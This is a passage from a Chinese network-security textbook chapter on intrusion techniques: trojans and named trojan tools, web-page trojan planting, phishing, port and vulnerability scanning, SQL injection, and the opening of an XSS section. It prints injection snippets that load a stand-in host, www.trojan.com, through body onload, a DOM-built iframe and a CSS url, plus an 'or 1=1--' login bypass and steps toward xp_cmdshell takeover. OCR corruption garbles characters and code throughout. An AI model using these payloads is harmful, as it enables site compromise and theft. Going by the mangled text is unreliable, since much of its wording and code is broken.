垃圾 数据 ,直到 使 盘 数 据 被 全 部 破坏 为 止 。 最 坏 情 况 下 ,硬盘 (包括 C 盘 ) 所 有 数据 ( 含 全 
部 逻辑 盘 数据 ) 均 被 破坏 , 某 些 主板 上 的 Flash Rom 中 的 BIOS 信息 也 将 被 清除 。 


2 木马 

木 与 源 目 硕 及 神话 人 《木马 导 城 记 》, 也 称 特洛伊 本 马 (Trojan Horse) ,传说 古 布 及 十 兵 
藏 在 特洛伊 木马 内 进入 并 占领 敌 方 城市 。 现 今 ,木马 是 指 在 计算 机 系统 中 被 植 入 的 人 为 
设计 的 恶意 程序 ,是 一 种 基于 远程 控制 的 黑客 工具 。 用 户 计算 机 一 旦 遭 到 木马 的 人 侵 , 便 
在 坚 无 察觉 的 情况 下 锌 对 方 直 接管 理 .控制 资源 ,如 复制 文件 .修改 文件 .删除 文件 ,查看 
文件 内 容 . 上 传 文件 下载 文件 等 ;或 者 被 对 方 控制 目 己 的 键盘 鼠标 ,随意 修改 计算 机 的 注 
册 表 和 系统 文件 ;也 可 能 被 对 方 监视 任务 并 可 随时 被 终止 任务 , 甸 取 计算 机 信息 资料 ,或 
者 被 远程 关闭 或 重 局 计 算 机 ,并 恶意 致使 计算 机 系统 瘫痪 。 

木马 基本 上 部 是 网 络 客户 端 和 服务 锅 端 程序 的 组 合 ,一般 由 在 服务 全 端 运行 的 程序 
和 攻击 者 控制 的 客户 奖 程 序 组 成 。 攻 击 者 利用 "木马 "入侵 网 络 一 般 采 用 如 下 方式 : 让 抑 
在 目标 主机 上 植 人 木马 并 启动 和 隐藏 客户 端木 马 ,再 将 服务 峰 端 和 客户 端 建立 连接 ,然后 
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进行 远程 控制 。 木 马 攻 击 的 关键 技术 如 下 。 

1) 木马 植 和 人 技术 

木马 植 人 有 主动 植 和 人 和 被 动 植 人 两 大 类 。 主 动 植 人 是 指 攻击 者 主动 将 木马 程序 植 人 
用 户 计算 机 ,其 行为 过 程 完 全 由 攻击 者 主动 向 握 ;而 被 动 植 和 人 是 指 攻击 者 设置 一 些 环境 ， 
等 得 日 标 系统 用 户 可 能 的 操作 , 当 用 户 在 这 种 环境 下 进行 操作 时 ,木马 程序 就 可 以 植 入 日 
标 系统 。 主 动 植 人 是 攻击 者 在 获取 目标 主机 的 操作 权限 时 月 己 动 手 进行 的 植 人 操作 , 采 
取 的 方式 主要 是 利用 系统 目 且 漏洞 和 第 三 方 软件 漏洞 进行 植 信 。 被 动 植 人 主要 采用 电子 
邮件 、 网 页 浏览 .网络 下 载 . 即 时 通信 工具 ,与 其 他 程序 捆绑 、 移 动 存 储 设备 等 方式 进行 
植 人 。 

2) 上 月 动 加 载 技术 

木马 程序 被 植 人 目标 主机 后 ,能 自动 启动 和 运行 ,攻击 和 入侵 目标 主机 完成 对 目标 主 
机 的 控制 ,这 就 是 日 动 加 载 技 术 。 

3) 隐藏 技术 

木马 要 想 在 目标 主机 中 生存 ,必须 把 自己 隐藏 并 潜伏 下 来 ,使 得 合法 用 户 不 容易 发 

4) 连接 技术 

建立 连接 时 ,木马 的 服务 端 会 在 目标 主机 上 打开 一 个 端口 进行 侦 听 ,如 果 有 客户 机 向 
服务 硕 的 这 一 端口 提出 连接 请 求 ,木马 服务 需 端 的 相关 程序 就 会 自动 运行 ,并 局 动 一 个 守 
护 进程 应 答 客 户 机 的 各 种 请 求 。 

5) 监控 技术 

木马 连接 建立 后 ,服务 器 端口 和 客户 端 端口 会 出 现 一 条 通道 ,客户 端 程序 通过 这 条 通 
道 联系 服务 絮 上 的 木马 程序 对 其 远程 控制 。 

常见 的 木马 可 以 分 为 4 类 , 即 远程 访问 型 .密码 发 送 型 ,键盘 记录 型 和 左 坏 型 。 

1) 远程 访问 型 

这 是 目前 使 用 最 广 的 特洛伊 森马。 这 类 木马 可 以 远程 访问 被 攻击 者 的 硬盘 , 如 
RATS( 一 种 远程 访问 木马 ) 只 需要 运行 服务 闫 庙 程序 并 且 得 到 对 方 的 IP, 就 可 以 访问 他 
的 计算 机 ,并 进行 相关 的 读 写 操作 。 

远程 访问 型 特洛伊 木马 会 在 目标 计算 机 上 打开 一 个 端口 。 例 如 ,打开 目标 计算 机 的 
21 号 端口 ,攻击 者 可 用 一 个 FTP 客户 端 并 且 不 用 密码 就 可 以 连接 到 目标 计算 机 ,并 拥有 
完全 的 上 传 和 下 载 权 限 。 一 些 特 洛 伊 木马 还 可 以 改变 端口 的 选 型 ,而 且 还 可 以 设置 连接 
密码 ,目的 是 只 能 让 攻击 者 控制 特洛伊 木马 。 

这 种 木马 的 目的 是 找到 所 有 的 隐 荐 密码 ,并 且 在 受害 者 不 知道 的 情况 下 把 它们 发 送 
到 指定 的 邮箱 。 此 类 木马 大 多 会 在 每 次 Windows 重新 启动 时 运行 ,而 且 大 多 使 用 25 端 
口 发 送 电 子 邮 件 。 如 果 目 标 计 算 机 有 隐藏 密码 ,那么 这 类 木马 是 非常 危险 的 。 

3) 键盘 记录 型 

此 类 木马 记录 受害 者 的 键盘 输入 并 有 旦 在 文件 中 查找 密码 。 这 种 木马 随 着 Windows 
的 启动 而 运行 。 它 们 有 在 线 记 录 和 离线 记录 的 功能 。 选 择 在 线 记 录 时 ,它们 知道 被 侵入 
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者 在 线 并 且 记 录 每 件 事 情 。 但 是 ,选择 离线 记录 时 ,每 一 件 事 情 在 Windows 局 动 后 才 被 
记录 ,并 且 保 存在 受害 者 位 盘 上 等 每 外 移动 。 
4) 毁坏 型 
此 类 木马 毁坏 并 且 删 除 文件 ,比较 商 单 ,也 容易 被 发 现 。 它 能 月 动 删 除 目 标 计 算 机 的 
所 有 后 级 名 为 ALL INIEXE 等 的 文件 ,一 旦 被 感染 了 , 束 会 严重 威胁 到 计算 机 的 安全 。 
见 的 木马 工具 见 表 1-1。 
表 1-1 常见 的 木马 工具 
名 称 简 介 
这 是 功能 最 全 的 TCP/IP 结构 的 攻击 工具 ,可 以 搜集 信息 ,执行 系统 命令 ,重新 
设置 机 器 .重新 定向 网 络 的 客户 端 /服务 器 应 用 程序 。 支 持 多 个 网 络 协议 , 它 可 
以 利用 TCP 或 UDP 传送 ,还 可 以 用 XOR 加 密 算 法 或 更 高 级 的 3DES 加 密 算法 
加 密 
该 程序 可 以 实现 自动 跟踪 目标 计算 机 的 屏幕 变化 ,获取 目标 计算 机 的 登录 口令 
Glacier 及 各 种 密码 类 信息 、 限 制 目 标 计 算 机 系统 功能 ,任意 操作 目标 计算 机 文件 及 目 
录 ,远程 关机 ,发 送信 息 等 多 种 监控 功能 ,类 似 于 B02000 木马 
键盘 幽灵 通过 直接 访问 键盘 输入 的 缓冲 区 ,记录 在 键盘 上 输入 的 用 户 电 子 邮 
箱 .代理 的 账号 .密码 等 信息 ,并 在 系统 根 目 录 下 生成 一 文件 名 为 KG. DAT 的 
隐 含 文件 
这 个 程序 可 以 将 指定 的 攻击 程序 捆绑 到 任何 一 个 广 为 传 播 的 热门 软件 上 ,使 宿 
ExeBind 主 程序 执行 时 ,寄生 程序 也 在 后 台 被 执行 , 且 文 持 多 重 捆绑 。 实 际 上 是 通过 多 
次 分 割 文 件 , 多 次 从 父 进程 中 调用 子 进程 实现 的 
NetBus 木马 也 叫 Windows NT/2000 特洛伊 木马 程序 ,是 一 种 用 于 远 距 离 控 制 
的 程序 , 它 会 在 被 驻 留 的 系统 中 开 一 个 “后 门 ”, 使 所 有 连接 到 Internet 上 的 人 都 
能 秘密 访问 到 被 驻 留 的 机 器 ,其 重 定向 功能 使 攻击 者 可 以 通过 被 控制 机 控制 其 
网 络 中 的 第 三 台 机 器 ,从 而 伪装 成 内 部 客户 机 


B02000 木马 


键盘 幽灵 
(KeyboardGhost) 


Netbus 木马 


122 恶意 网 页 


在 移动 互联 网 出 现 之 前 ,使 用 训 览 需 进 行 网 页 浏览 一 直 是 普通 计算 机 用 户 使 用 互联 
网 的 主要 方式 ,由 此 就 衍生 出 很 多 针对 浏览 右 的 攻击 方法 ,其 中 最 主要 的 两 种 方式 是 挂 马 
和 钓鱼 。 而 在 移动 互联 网 时 代 , 虽 然 人 们 更 多 地 使 用 App 上 网 ,但 很 多 流行 App 部 会 内 
舱 浏 览 需 模块 ,可 以 打开 网 址 链接 浏览 网 页 。 因 此 , 亚 意 网 页 对 于 手机 用 户 来 说 仍然 存在 
一 定 的 威胁 。 


1 网 页 挂 马 
网 页 挂 马 指 的 是 黑客 利用 木马 生成 带 或 其 他 程序 编写 的 破坏 计算 机 系统 的 程序 , 通 
过 系统 漏洞 或 者 其 他 攻击 方式 登录 到 远程 Web 服务 器 ,将 木马 程序 植 人 到 Web 服务 器 

的 网 页 中 ,从 而 在 用 户 单 击 网 页 时 进行 盗 链 、 增 加 有 目 己 网 站 的 访问 量 . 祝 取 用 户 信息 、 破 坏 
网 站 数据 库 等 行为 ,达到 攻击 服务 震 、 使 服务 需 次 痰 的 目的 。 

在 远程 服务 带 痪 ,由 于 系统 管理 员 的 下 忽 ,经 背 会 有 打 补 丁 不 及 时 ,造成 系统 存在 漏 
洞 的 现象 ,这 也 是 网 站 维护 过 程 中 不 可 避免 的 事情 ,而 黑客 往往 会 利用 这 些 系 统 源 洞 通过 
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咒 探 \ 监 测 .权限 提升 等 手段 攻击 服务 硕 , 然 后 将 恶意 代码 程序 植 人 网 页 ,这 些 恶 意 代码 主 
要 是 一 些 利用 IE 等 漏洞 的 代码 ,用 户 访问 被 挂 马 的 页 面 时 ,如 果 系统 没有 更 新 恶意 代码 
中 利用 源 洞 的 补丁 , 则 会 执行 恶意 代码 程 序 ,进行 盗号 等 危险 操作 ,其 人 至 在 系统 管理 员 不 
知情 的 情况 下 将 系统 管理 员 输 入 的 超级 管理 员 账 号 、 密 码 悄 悄 发 送 到 黑客 制订 的 邮箱 。 
得 到 超级 管理 员 权 限 后 修改 网 站 页 面 、 复 改 数据 、 植 入 日 己 的 链接 ,用 户 每 次 访问 页 面 时 
即 可 访问 网 页 挂 马 的 散布 者 植 人 的 链接 ,甚至 导致 用 户 将 木马 下 载 并 执行 ,然后 又 进行 不 
扬 的 复制 和 传播 ,恶性 循环 ,从 而 使 更 多 的 用 户 计算 机 受到 攻击 并 被 控制 。 网 页 挂 马 散布 
者 最 二 接 的 目的 是 获取 更 多 的 用 户 贰 源 。 

网 页 挂 马 常见 的 方式 有 如 下 7 种 。 

(1) 木马 程序 会 伪 站 成 一 个 图 片 或 者 一 个 动画 ,或 者 其 他 页 面 元 素 , 普 通用 户 很 难 发 
现 , 当 用 户 浏 贤 网 页 时 ,这 个 木马 程序 就 被 浏览 带 下 载 到 本 地 运行 且 被 复制 传播 。 

(2) 框架 挂 马 。 木 马 程序 是 以 一 个 网 址 ,用 框 染 页 面 馈 舱 到 网 页 中 , 当 用 户 正 常 访问 
页 和 面 时 ,就 会 加 载 这 个 框架 页 ,被 访问 后 束 会 中 此 木马 程序 ,用 户 单 赁 肉眼 是 发 现 不 了 的 。 

(3) js 文件 挂 马 。 这 种 挂 马 方式 是 将 基于 JavaScript 的 代码 程序 镶 骸 到 网 页 的 js 文 
件 中 ,尤其 是 网 站 中 如 采 只 运用 了 一 个 或 几 个 js 文件 ,这 样 的 网 站 最 容 多 被 挂 马 , 并 且 只 
要 调用 了 这 个 js 文件 的 页 面 , 台 会 被 执行 。 

(4) js 变形 加 密 。js 挂 马 还 可 以 将 代码 用 其 他 加 密 方式 进行 加 密 , 通 过 加 密 代 码 的 
方式 隐藏 该 信息 。 

(5) body 挂 马 。 在 body 标签 中 通信 以 下 代码 : 二 bodyonload 二 "window. location 王 
http: //www. trojan. com/ 3; 全 过 /body>, 当 用 户 正 第 访问 时 ,页 面 会 发 生 跳 移 并 加 副 
访问 http: //www. trojan. comy/ 了 网址 ,从 而 达到 执行 恶意 代码 的 目的 。 

(6) 陆 贡 挂 马 。 黑 客 在 网 页 中 般 入 以 下 Javascript 代码 : 过 script 二 top. document. 
body. innerHTML = top. document. body, innerHTML 十 \r\n=<iframe src 一 "http: 
//www. trojan. com/" 全 过 /iframe 二 ;一 /script 全 ,并 将 代码 放 在 一 些 比较 隐蔽 的 位 置 ， 
当 页 面 执行 时 ,会 通过 DOM 操作 的 方式 创建 框架 访问 http: //www. trojan. com/ ,从 而 
实现 恶意 代码 的 执行 。 

(7) CSS 中 挂 马 。 这 种 方式 是 将 黑客 代码 铭 舱 到 CSS 样式 表 中 。 例 如 ,body { back- 
ground-image: url('javascript: document. write(" < scriptsrc= http: //www. trojan. 
com/1.js 祖 二/script 禄 "))}), 当 用 户 页 面 执行 到 body 标签 时 ,就 会 根据 CSS 中 定义 的 育 
丸 图 片 地 址 进行 访问 ,而 访问 的 内 容 束 是 震 客 挂 载 的 木马 程序 。 生 见 的 网 页 挂 马 方式 还 
不 止 这 几 种 ,实际 运行 中 ,木马 程序 常 当 会 更 改 系统 时 间 , 防 止 杀 毒 软件 对 其 进行 清理 ,更 
改 病毒 库 , 使 日 己 相 对 于 杀毒 软件 来 说 有 具有 “免疫 功能 ”等 。 


2 钓鱼 网 站 
所 请 钓鱼 网 站 ,就 是 页 面 中 含有 虚假 欺诈 信息 的 网 站 。 比 较 常 见 的 钓鱼 网 站 形式 有 
仿冒 银行 ,仿冒 登录 (如 虚假 的 QQ 空间 登录 页 面 等 )、 虚 假 购物 、 虚 假 票 务 、 虚 假 招 聘 \、 虚 
假 中 奖 .虚假 博彩 .虚假 色情 网 站 等 。 
钓鱼 网 站 的 实质 是 内 容 的 欺骗 性 ,而 页 面 本 号 一 般 并 不 包含 任何 恶意 代码 ,没有 代码 
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层面 的 恶意 特征 ,甚至 在 很 多 情况 下 ,即便 是 专业 安全 人 员 ,也 很 难 仅 从 页 面 内 容 判 断 网 
页 内 容 的 真实 性 。 因 此 ,使 用 传统 的 反 病 毒 技 术 中 的 特征 识别 技术 很 难 有 效 识 别 出 钓 鱼 
网 站 ,更 不 太 可 能 在 用 尸 计 算 机 本 地 疾 进 行 识别 。 也 就 是 说 , 尽 定 从 制作 技术 看 ,钓鱼 网 
站 要 比 木 马 病毒 简单 得 多 ,但 其 识别 难度 更 大 ,欺骗 性 更 强 。 


123 网 络 扫描 


1 扫 拉 器 简介 

扫 摘 希 是 一 种 通过 收集 系统 的 信息 目 动 检测 远程 或 本 地 主机 安全 蜀 点 的 程序 ,通过 
使 用 扫描 器 ,可 以 发 现 远程 服务 器 TCP 端口 的 分 配 情况 ,提供 的 网 络 服务 和 软件 的 版 本 ， 
这 就 能 让 网 络 人 侵 者 或 管理 员 间 接 或 二 接 了 解 到 远程 主机 存在 的 安全 问题 。 

扫描 融通 过 回 远 程 主机 不 同 的 端口 服务 发 出 请 求 访 问 ,并 记录 目标 给 予 的 应 答 ,搜集 
大 量 关 于 目标 主机 的 各 种 有 用 信息 。 扫 摘 带 的 工作 流程 如 图 1-3 所 示 。 扫 描 胡 并 不 是 耳 
接 实 施 攻击 的 工具 , 它 仅 能 带 助 网 络 人 侵 者 发 现 目标 系统 的 某 些 内 在 的 弱点 。 一 个 好 的 
扫 摘 涯 能 对 它 得 到 的 信息 进行 分 析 , 带 助攻 击 者 查找 目标 主机 的 漏洞 ,但 它 并 不 会 提供 入 
侵 一 个 系统 的 详细 步骤 。 


f 
F 


四 | 利用 已 知 信息 测试 和 控 测 
| 开始 ”站 一 ”| 循环 执行 | | 实际 系统 或 者 网 络 


一 条 一 条 地 取信 息 
(直到 取 完 ) 


[存放 到 文件 ， 
是 或 者 
输出 显示 


] 信息 库 | = 和 发 现 弦 点 ? a 


1-3 扫描 融 的 工作 流程 


按照 扫描 的 目的 分 类 ,扫描 器 可 以 分 为 端口 扫描 器 和 漏洞 扫描 器 。 端 口 扫 描 器 只 是 
单纯 用 来 扫描 目标 系统 开放 的 网 络 服 务 端 口 以 及 问 口 的 相关 信息 。 和 第 见 的 端口 扫描 右 有 
Nmap、Prot Scans 等 ,这 类 扫描 如 并 不 能 给 出 耳 接 可 以 利用 的 汤 洞 信息 ,而 是 给 出 了 目标 
系统 中 网 络 服务 的 基本 运行 信息 ,这 些 信 息 对 于 普通 人 来 说 也 许 是 极为 平常 的 ,丝毫 不 能 
对 系统 安全 造成 威胁 ,但 一 旦 到 了 网 络 入 侵 者 手 里 ,这 些 信息 就 成 为 突破 系统 必需 的 关键 
信息 。 

杞 闹 口 扫 摘 各 相 比 , 湄 洞 扫 描 禹 更 耳 接 , 它 检查 目标 系统 中 可 能 包含 的 已 知 源 洞 ,如 
末 发 现 港 在 的 源 洞 , 束 报 告 给 扫 摘 者 。 这 种 扫 摘 禹 的 威胁 性 极 大 ,网 络 入 侵 者 可 以 利用 扫 
描 到 的 结 采 直接 攻击 。 这 种 扫 朱 和 奉 的 种 类 很 多 ,着 名 的 有 ISS、Nessus、SATAN 等 。 漏 

10 


第 1 章 网 络 入 侵 


洞 扫 换 禹 里 然 给 出 浴 在 的 汤 洞 ,但 这 些 源 洞 一 般 用 手工 方法 同样 可 以 检测 到 ,使 用 源 洞 扫 
摘 符 只 是 为 了 捉 局 效 诗 。 而 潮 润 扫 摘 被 入 侵 检测 设备 和 有 经 验 的 网 络 安 全 监测 人 员 人 发现 
的 可 能 性 较 大 ,从 而 又 赴 出 网 络 人 侵 痢 的 行踪 和 目的 。 


2 网 络 扫 摘 

网 络 扫 摘 是 对 网 络 或 者 系统 网 络 服务 进行 扫 摘 ,主要 气 成 的 工作 是 检验 系统 提供 服 
务 的 安全 性 ,如 FTP、Telnet、NFS(Network File System) 、Rsh(CRemote Shell) 、Rexd 访 
问 .Sendmail 漏洞 .TFTPCTrivial File Transfer Protocol) 漏洞 、X 服务 融 的 安全 和 访问 欣 
制 等 。 和 津 用 的 网 络 安全 扫描 工具 有 ISS、SATAN (Security Administrator's Tool for 
Anolyzing Networks)、Nmap(Network Mapper)。 网 络 扫 摘 技术 主要 有 如 下 4 种 。 

1) 侦查 扫描 

侦查 扫描 是 利用 各 种 网 络 协 议 产 生 的 数据 包 以 及 网 络 协 议 本 号 固有 的 性 质 进行 扫 
描 , 目 的 是 确认 目标 系统 是 否 处 于 激活 状态 ,获取 目标 系统 信息 。 常 用 的 扫描 方法 有 
Ping Sweeps、TCP Sweeps、UDP Sweeps .操作 系统 确认 扫 摘 等 。 

2) 曾 口 扫描 

交口 扫 摘 是 要 得 到 目标 系统 所 能 提供 的 服务 信息 。 如 采 锁 位 地 配置 网 络 服务 ,以 及 
使 用 的 网 络 服 务 守 护 软 件 有 被 公开 的 漏洞 ,就 很 可 能 受到 攻击 者 的 人 侵 。 例 如 ,开放 
RPC、Rlogin 等 服务 ,因为 没有 很 好 的 保护 机 制 ,入 侵 者 很 容 匈 侵入 系统 。 

TCP 扫描 一 般 都 是 根据 TCP 数据 的 标志 设置 三 次 握手 中 交互 出 现 的 问题 扫描 的 。 其 
中 FIN 扫描 ,RESET 扫描 ,SYN/ ACK、XMAS、NULL 扫描 都 属于 “ 偷 扫 ”(Stealth scan) 。 

以 下 是 一 个 TCP 包头 数据 格式 (总 长 度 20B) 。 


芋 蒜 落 


3) 域 查 询 回 丛 扫 摘 

扫描 者 发 送 没有 被 问 过 的 域 问题 ,目的 是 发 现 目标 主机 是 不 是 存在 ,返回 目标 主机 不 
可 达 信 息 。 如 果 扫 描 者 使 用 太 多 和 过 度 频 繁 地 使 用 这 种 扫描 方式 ,同样 会 被 人 侵 检 测 系 
统 发 现 。 但 是 ,在 一 般 的 扫描 中 很 难 被 发 现 , 属 于 反 回 映射 扫 摘 。 

4) 代理 /FTP 弹跳 扫描 

如 果 一 个 协议 或 者 服务 能 被 网 络 扫描 需 探 测 ,以 至 于 服务 可 以 提供 任意 的 网 络 连接 ， 
然后 这 个 协议 就 可 以 被 用 来 进行 端口 扫描 。 一 些 代 理 服务 和 FTP 守护 进程 可 以 被 用 作 
产生 端口 扫描 。 经 典 的 例子 就 是 FTP 端口 扫描 ,其 中 代理 FTP 服务 右 被 用 来 癌 许 多 系 
统 连接 。FTP 允许 用 户 指 定 哪 个 IP 地 址 或 者 端口 是 要 FTP 服务 需 发 送 数据 的 。 从 
FTP 服务 需 返 回 的 信息 可 以 证 实 目标 的 端口 是 不 是 开放 的 。 


124 _ Web 攻击 


1 SQL 注入 攻击 
SQL 注 人 (SQL Injection) 是 攻击 者 通过 在 查询 操作 中 插入 一 系列 SQL 语句 来 操作 
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数据 写 入 到 应 用 程序 中 。StephenKost 给 出 了 SQL 注入 的 一 个 特征 ,“ 从 一 个 数据 库 获 
得 未 经 授权 的 访问 和 下 接 检 索 ”。 利 用 SQL 注入 技术 实施 网 络 攻击 常 称 为 SQL 注入 攻 
击 , 其 本 质 是 利用 Web 应 用 程序 中 输入 的 SQL 请 句 的 语法 处 理 ,针对 的 是 Web 应 用 程 
序 开 发 者 编程 过 程 中 未 对 SQL 语句 传人 的 参数 做 出 严格 的 检查 和 处 理 造成 的 情况 。 习 
惯 上 将 存在 SQL 注入 点 的 程序 或 者 网 站 称 为 SQL 注入 漏洞 。 实 际 上 ,SQL 注入 是 存在 
于 有 数据 库 连接 的 应 用 程序 中 的 一 种 泌 油 ,攻击 者 通过 在 应 用 程 友 中 预 完 定义 好 的 查询 
语句 结尾 加 上 和 后 外 的 SQL 语句 元 系 ,欺骗 数据 库 服务 天 执行 非 授 权 的 查询。 这 类 应 用 程 
序 一 般 是 基于 Web 的 应 用 程序 , 它 允 许 用 户 输入 查询 条 件 , 并 将 查询 条 件 舱 入 SQL 请 求 
语句 中 ,发 送 到 与 该 应 用 程 厅 相 关联 的 数据 库 服务 带 中 执行 。 通 过 构造 一 些 旺 形 的 输入 ， 
攻击 者 能 够 操作 这 种 请 求 语句 获取 预先 未 知 的 结果 。 

SQL 注入 攻击 是 目前 网 络 攻击 的 主要 手段 之 一 ,一 定 程度 上 其 安全 风险 高 于 缓冲 区 
溢出 省 洞 ,目前 防火 墙 不 能 对 SQL 注入 源 洞 进行 有 效 的 防范 。 防 火 墙 为 了 使 合法 用 户 运 
行 网 络 应 用 程序 访问 服务 硕 奖 数据 ,必须 允许 从 Internet 到 Web 服务 大 的 正 回 连 接 , 因 
此 ,一 旦 网 络 应 用 程序 有 注入 淹 洞 ,攻击 者 就 可 以 卫 接 访问 数据 库 , 其 至 能 够 获得 数据 库 
所 在 的 服务 需 的 访问 权 。 因 此 ,在 某 些 情况 下 ,SQL 注入 攻击 的 风险 要 高 于 所 有 其 他 小 
洞 。SQL 注入 攻击 具有 以 下 特点 。 

(1) 广泛 性 。SQL 注入 攻击 利用 的 是 SQL 请 法 ,因此 ,只 要 利用 SQL 请 法 的 Web 
应 用 程序 未 对 输入 的 SQL 语句 做 严格 的 处 理 ,都 会 存在 SQL 注入 汤 洞 。 目 前 ,以 
Active/Java Server Pages、 PHP、Perl 等 技术 与 SQL Server、Oracle .DB2 、 Sybase 等 数据 
库 相 结合 的 Web 应 用 程序 均 存在 SQL 注入 漏洞 。 

(2) 技术 难度 不 高 。SQL 注入 技术 公布 后 ,网 络 上 先后 出 现 了 多 球 SQL 注入 工具 ， 
如 教主 的 HDSI、NBSI、 明 小 子 的 Domain 等 ,利用 这 些 工 具 软 件 可 以 轻 多 地 对 存在 SQL 
注入 的 网 站 或 者 Web 应 用 程序 实施 攻击 ,并 最 终 获 取 其 计算 洛 的 控制 权 。 

(3) 危害 性 大 。SQL 注入 攻击 成 功 后 , 轻 者 则 更 改 网 站 前 页 每 数据 , 重 者 则 通过 网 络 
渗透 等 攻击 技术 ,可 以 获取 公司 或 者 企业 的 机 蜜 数据 信息 ,产生 巨大 的 经 济 损失 。 

结构 化 查询 博 言 (SQL) 是 一 种 用 来 和 数据 库 交 互 的 文本 语言 。SQL 注 人 攻击 就 是 
利用 某 些 数据 库 的 外 部 接口 把 用 户 数据 插入 到 实际 的 数据 库 操作 语言 中 ,从 而 达到 入 侵 
数据 库 乃 至 操作 系统 的 目的 。 它 的 产生 主要 原因 是 程序 对 用 户 输入 的 数据 没有 进行 细致 
的 过 滤 ,导致 非法 数据 的 寻 人 和 碍 询 。 

SQL 注入 攻击 主要 是 通过 构建 特殊 的 输入 (这 些 输入 往往 是 SQL 语法 中 的 一 些 组 
合 , 将 作为 参数 传人 Web 应 用 程序 ) ,通过 执行 SQL 语句 而 执行 入 侵 者 想 要 的 操作 。 下 
面 以 登录 验证 中 的 模块 为 例 , 说 明 SQL 注入 攻击 的 实现 方法 。 

在 Web 应 用 程序 的 登录 验证 程序 中 ,一 般 有 用 户 名 (username) 和 各 公 (password) 两 
个 参数 ,程序 会 通过 用 户 提 交 的 用 户 名 和 密码 执行 授权 操作 。 其 原理 是 通过 查找 user 表 
中 的 用 户 名 和 密码 的 结果 进行 授权 访问 。 典 型 的 SQL 查询 语句 为 


Select * fram users where usemame = 'admin'" and passworcF Smith 


如 果 分 别 给 username 和 password 赋值 admin or 1 王 1-- 和 aaa, 那 么 SQL 脚本 解释 
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谷中 的 上 述 语 句 束 会 变 为 
Select * frcom users where user name = "achnn or = 1- -~ and passworcEF 'aaa' 


该 二 句 中 进行 了 两 个 判断 ,只 要 一 个 条 件 成 立 , 就 会 成 功 执行 ,而 1 二 1 在 逻辑 判断 上 重 
成 立 , 后 面 的 “--” 表 示 注 释 , 即 后 面 折 有 的 语句 都 为 注释 语句 。 同 理 ,通过 在 输入 参数 中 构 
建 SQL 语法 还 可 以 实现 删除 数据 库 中 的 表 , 查 询 \ 择 入 和 更 新 数据 库 中 的 数据 等 危险 操作 。 

SQL 注入 攻击 可 以 手工 进行 ,也 可 以 通过 SQL 注入 攻击 辅助 软件 ,如 HDSI、 
Domain NBSI 等 ,其 实现 过 程 可 以 归纳 为 以 下 5 个 阶段 。 

(1) 寻找 SQL 注入 点 。 寻 找 SQL 注入 点 的 经 典 方 法 是 在 有 参数 传人 的 地 方 浴 加 证 
如 “and 1 王 1 and 1 二 2” 以 及 “” 等 一 些 特殊 字符 ,通过 浏览 带 返 回 的 错误 信息 判断 是 否 
存在 SQL 注入 ,如 果 返 回 错误 , 则 表明 程序 未 对 输入 的 数据 进行 处 理 , 绝 大 部 分 情况 下 都 

能 进行 注入 。 

(2) 获取 和 验证 SQL 注入 点 。 找 到 SQL 注入 点 后 ,需要 进行 SQL 注入 点 的 判断 ， 
通常 采用 SQL 语句 进行 验证 。 

(3) 获取 人 信息。 获取 信息 是 SQL 注入 中 的 一 个 关键 部 分 ,SQL 注入 中 首先 需要 判断 
存在 注入 点 的 数据 库 是 耕 文 持 多 句 查 询 、 子 查询 数据库 用 户 账号 数据 库 用 户 权限 。 如 
果 用 户 权 限 为 sa, 旦 数据 库 中 存在 xp_cmdshell 存储 过 程 , 则 可 以 直接 转 步 又 (4) 。 

(4) 实施 直接 控制 。 以 SQL Server 2000 为 例 , 如 果实 施 注 入 攻击 的 数据 库 是 
SQLServer 2000, 且 数据 库 用 户 为 sa, 则 可 以 直接 添加 管理 员 账 亏 .开放 3389 十 程 终 蜂 
服务 .生成 文件 等 命令 。 

(5) 间接 控制 。 间 接 控制 主要 是 指 通过 SQL 注入 点 不 能 执行 DOS 等 命令 ,只 能 动 
行 数 据 字 段 内 容 的 猜测 。 在 Web 应 用 程序 中 ,为 了 方便 用 户 的 维护 ,一般 都 提供 了 后 台 
管理 功能 ,其 后 台 管 理 验证 用 户 和 口令 都 会 保存 在 数据 库 中 ,通过 猜测 可 以 获取 这 些 内 
容 ,如 来 获取 的 是 明文 的 口令 , 则 可 以 通过 后 台中 的 上 传 等 功能 上 传 网 页 木马 实施 控制 ， 
如 来 口令 是 明文 的 , 则 可 以 通过 又 力 破解 其 密码 。 


2 跨 站 脚本 攻击 

近年 来 ,Internet 网 络 的 安全 问题 成 为 人 们 关注 的 焦点 ,基于 网 站 漏洞 的 攻击 和 基于 
绥 冲 区 溢出 漏洞 的 攻击 占据 了 所 有 网 络 攻 击 和 渗透 的 绝 大 多 数 ,成 为 最 流行 的 网 络 攻击 
方式 。 其 中 ,基于 网 站 泌 洞 的 攻击 包括 SQL 注入 攻击 、Google Hacking 攻击 、 钓 鱼 式 攻 
击 和 里 站 脚本 攻击 ,特别 是 器 站 脚本 攻击 ,以 它 独 有 的 攻击 特性 开辟 了 网 站 攻击 技术 发 展 
的 新 方 问 。 

据 国外 着 名 安全 组 织 Security Team 公布 的 相关 数据 显示 ,平均 每 个 月 有 10 一 25 个 
跨 站 脚本 源 洞 被 发 现 ,而 且 呈 现 运 潮 上 升 的 趋 抒 ,如 着 名 的 FBI gov、CNN. com, Time. 
eom,、Ebay、Yahoo、Applecomputer、Microsoft 等 著名 网 站 都 曾经 存在 器 站 脚本 攻击 涯 
洞 。 因 此 ,无 论 是 网 站 开发 人 员 ,还 是 普通 网 络 用 户 , 都 有 必要 加 强 对 器 站 脚本 攻击 的 认 
识 和 人 研究 ,只 有 做 到 知己 知 彼 ,才能 真正 做 到 防 患 于 未 然 。 

1) 静态 网 站 和 动态 网 站 的 区 别 

现在 的 网 站 有 两 种 类 型 : 静态 网 站 和 动态 网 站 。 所 谓 "* 静 态 网 站 ”, 是 指 网 站 的 网 页 
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内 容 “ 固 定 不 变 ”, 当 用 户 浏 览 右 通过 互联 网 的 HTTP 向 网 站 Web 服务 硕 请 求 提 供 网 页 
时 ,Web 服务 器 仅 是 将 原来 设计 好 的 静态 HTML 文档 传 给 浏览 器 ;而 “动态 网 站 ”包括 固 
定 内 容 和 动态 内 容 , 能 根据 用 户 的 需求 和 选择 进行 动态 的 改变 和 啊 应 , 当 用 户 浏 宽带 收 到 
一 个 动态 页 面 时 ,动态 网 站 则 动态 地 确定 如 何 回 用 户 显 示 输 出 的 内 容 。 然 而 ,动态 网 站 三 
在 看 一 种 静态 网 站 没有 的 威胁 ,被 称 作 “器 站 脚本 ”(Cross Site Scripting,XSS)。 当 动态 
